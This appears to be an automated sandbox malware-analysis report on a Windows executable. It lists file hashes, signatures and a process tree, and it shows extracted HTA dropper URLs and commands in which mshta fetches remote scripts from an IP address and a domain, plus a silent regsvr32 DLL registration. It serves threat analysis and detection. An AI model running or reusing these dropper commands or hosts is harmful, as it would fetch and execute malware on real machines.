Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2024 05:14

General

  • Target

    ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe

  • Size

    31KB

  • MD5

    ab30aae35c2c14af366a5647ca1e53e1

  • SHA1

    8d30e8b000e09763e18c3b330a91cccd5e5770da

  • SHA256

    ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c

  • SHA512

    b01ea5f06121288b966ecd5e84d146ab3dddd1a23a2b3ea135607a69b2c9c309a6d8833664ab231247415adf1b7b9edb91337e12f9a508b52914c48ce323cb94

  • SSDEEP

    768:sYzkFZqKKeZOyYMY1J4UWPknF0KaHw2PQUbj3m1hv9:YFIeZRYMIJSPkF0KaHFQ8shF

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://95.211.27.154/install.php?id=02944

Extracted

Language
hta
Source
URLs
hta.dropper

http://urodinam.net/8732489273.php

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NTFS ADS 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe
    "C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\SysWOW64\mshta.exe
      mshta http://95.211.27.154/install.php?id=02944
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:3116
    • C:\Windows\SysWOW64\mshta.exe
      mshta http://urodinam.net/8732489273.php
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:4424
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp.bat
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Users\Admin\AppData\Local\Temp\dll.exe
        C:\Users\Admin\AppData\Local\Temp\dll.exe C:\Users\Admin\AppData\Local\Temp\hlp.dll
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • NTFS ADS
        PID:3700
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\hlp.dll
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2996
      • C:\Users\Admin\AppData\Local\Temp\32.exe
        C:\Users\Admin\AppData\Local\Temp\32.exe C:\Users\Admin\AppData\Local\Temp\temp.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • NTFS ADS
        PID:4304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\32.exe

    Filesize

    3KB

    MD5

    67e233f1b51099732474c59d3d9c179b

    SHA1

    5585c79a211e4882096f753d79e0814f9f9bd5d7

    SHA256

    66ea418d861239407dd5b524c6443404b2e27b45097a585b4257e79666f859e4

    SHA512

    e54ce43b78e18b0632e4dba9e23afddbc5080fe837d31920bf51da11d8da535a84c10f65098e32e5cf27ffbf78bd9d283e88baeebd362f6855ddb0adcc83d45e

  • C:\Users\Admin\AppData\Local\Temp\dll.exe

    Filesize

    3KB

    MD5

    892eb2047d566f2e0288ecd98e150a4a

    SHA1

    557020450be4ca2e19dec021865b4ca14fc032d6

    SHA256

    56608e8b3bf96e9a1644c819713b6de1511002aeaa41299fe0dfd136f63ab635

    SHA512

    00db937ff6f337ccca134575cd4e159a5112c69e1347a09295ef31120fe465c1aa41d660c1fd6064cc524b98496a6cbe32cc731cc14245bc783ca6c2ef69bbe1

  • C:\Users\Admin\AppData\Local\Temp\temp.bat

    Filesize

    284B

    MD5

    23f055817c526491f40ed984f0fbdf7a

    SHA1

    6610dbcb67418435134ccf65aa7fae786cebef49

    SHA256

    a8c56d888219ada4d7064537f9fba2c05cac10ec552758e6d02d89da5d8e67fd

    SHA512

    d8a1abd46114026ae525c1aa45579b32980ac568450313f7911cf45b97025a244dec0b85dcbc41798145af23aef6cd312e2f556692c4338637f51fe83cf044b4

  • memory/1096-0-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

  • memory/1096-12-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB